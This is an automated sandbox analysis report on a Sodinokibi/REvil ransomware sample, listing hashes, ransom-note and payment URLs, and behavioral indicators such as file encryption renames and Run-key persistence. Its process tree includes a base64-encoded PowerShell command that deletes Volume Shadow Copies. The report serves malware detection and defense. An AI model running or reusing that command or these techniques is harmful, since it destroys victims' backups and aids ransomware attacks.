Analysis
-
max time kernel
145s -
max time network
184s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 02:07
Static task
static1
Behavioral task
behavioral1
Sample
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
Resource
win10-en-20211208
General
-
Target
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe
-
Size
114KB
-
MD5
004fe16edb1a1eb697a4809ea6f379cf
-
SHA1
55b75de0adb55d022d9f8653eb7c84a7a0be4a16
-
SHA256
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9
-
SHA512
1645e4095d6e1e959bc93e68ca69ad8ad5c80c5538c4ff680e12140924c6a16a99e29b636beed92f3b20db84aeb8eaca32b00bdeb58fcd0a34c05d2bfc63ce1b
Malware Config
Extracted
C:\031v3d378i-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FF394E98916B202E
http://decryptor.cc/FF394E98916B202E
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription ioc process File renamed C:\Users\Admin\Pictures\MeasureSelect.raw => \??\c:\users\admin\pictures\MeasureSelect.raw.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\CompressRestart.tif => \??\c:\users\admin\pictures\CompressRestart.tif.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\DenyUnregister.raw => \??\c:\users\admin\pictures\DenyUnregister.raw.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\InitializeRepair.tiff => \??\c:\users\admin\pictures\InitializeRepair.tiff.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\ReadMount.tif => \??\c:\users\admin\pictures\ReadMount.tif.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\UnregisterMount.crw => \??\c:\users\admin\pictures\UnregisterMount.crw.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\DisconnectPop.tif => \??\c:\users\admin\pictures\DisconnectPop.tif.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\EnableSuspend.png => \??\c:\users\admin\pictures\EnableSuspend.png.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\ExpandRegister.png => \??\c:\users\admin\pictures\ExpandRegister.png.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\DismountSubmit.tiff => \??\c:\users\admin\pictures\DismountSubmit.tiff.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\MountRegister.tif => \??\c:\users\admin\pictures\MountRegister.tif.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\users\admin\pictures\DismountSubmit.tiff 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\users\admin\pictures\InitializeRepair.tiff 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File renamed C:\Users\Admin\Pictures\AssertInstall.tif => \??\c:\users\admin\pictures\AssertInstall.tif.031v3d378i 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6tdi0IHKR7 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe" 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription ioc process File opened (read-only) \??\R: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\X: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\Y: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\H: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\K: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\N: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\Q: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\T: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\Z: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\G: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\I: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\J: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\P: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\V: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\W: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\D: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\A: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\F: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\M: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\S: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\U: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\B: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\E: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\L: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened (read-only) \??\O: 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Drops file in System32 directory 1 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dezfr11431t0.bmp" 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Drops file in Program Files directory 37 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription ioc process File opened for modification \??\c:\program files\DisableGrant.xltm 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\PopSelect.xml 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ReadRepair.mht 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ResetEnable.ppsm 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\UseUpdate.M2T 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\RedoOpen.tiff 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\031v3d378i-readme.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\SplitWrite.ps1xml 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\TestUnpublish.emf 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\TraceUnblock.ADTS 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File created \??\c:\program files\031v3d378i-readme.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\CheckpointBackup.odt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ConfirmSelect.avi 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\GrantUnblock.rar 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\PopBackup.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ClearResolve.xltx 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\FormatClear.bmp 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\MoveCheckpoint.xla 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\PingUpdate.m4v 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\RepairShow.wax 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\CompressDisconnect.m1v 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\OutCopy.AAC 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\031v3d378i-readme.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\RepairExport.jpg 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ResolveSearch.aifc 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\UpdateUnblock.wax 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\UnregisterUnblock.xht 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\031v3d378i-readme.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File created \??\c:\program files (x86)\031v3d378i-readme.txt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ApproveWait.mp4v 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\BlockCompress.dotx 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\OpenGrant.DVR-MS 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\OpenWait.odt 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\AssertConnect.TTS 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\CompareWatch.vssx 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\ConvertBackup.ods 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe File opened for modification \??\c:\program files\SwitchCompare.iso 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exepowershell.exepid process 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe 572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeBackupPrivilege 1492 vssvc.exe Token: SeRestorePrivilege 1492 vssvc.exe Token: SeAuditPrivilege 1492 vssvc.exe Token: SeTakeOwnershipPrivilege 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exedescription pid process target process PID 268 wrote to memory of 572 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe powershell.exe PID 268 wrote to memory of 572 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe powershell.exe PID 268 wrote to memory of 572 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe powershell.exe PID 268 wrote to memory of 572 268 4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe"C:\Users\Admin\AppData\Local\Temp\4e5d002e96ce8cf3c3a029e3b1cb7c06c57e4f6e61c60070fd53942f242cb2e9.exe"1⤵
- Modifies extensions of user files
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/268-55-0x0000000076141000-0x0000000076143000-memory.dmpFilesize
8KB
-
memory/572-56-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmpFilesize
8KB
-
memory/572-57-0x0000000002380000-0x0000000002382000-memory.dmpFilesize
8KB
-
memory/572-60-0x0000000002384000-0x0000000002387000-memory.dmpFilesize
12KB
-
memory/572-59-0x0000000002382000-0x0000000002384000-memory.dmpFilesize
8KB
-
memory/572-58-0x000007FEF34B0000-0x000007FEF400D000-memory.dmpFilesize
11.4MB
-
memory/572-61-0x000000001B850000-0x000000001BB4F000-memory.dmpFilesize
3.0MB
-
memory/572-62-0x000000000238B000-0x00000000023AA000-memory.dmpFilesize
124KB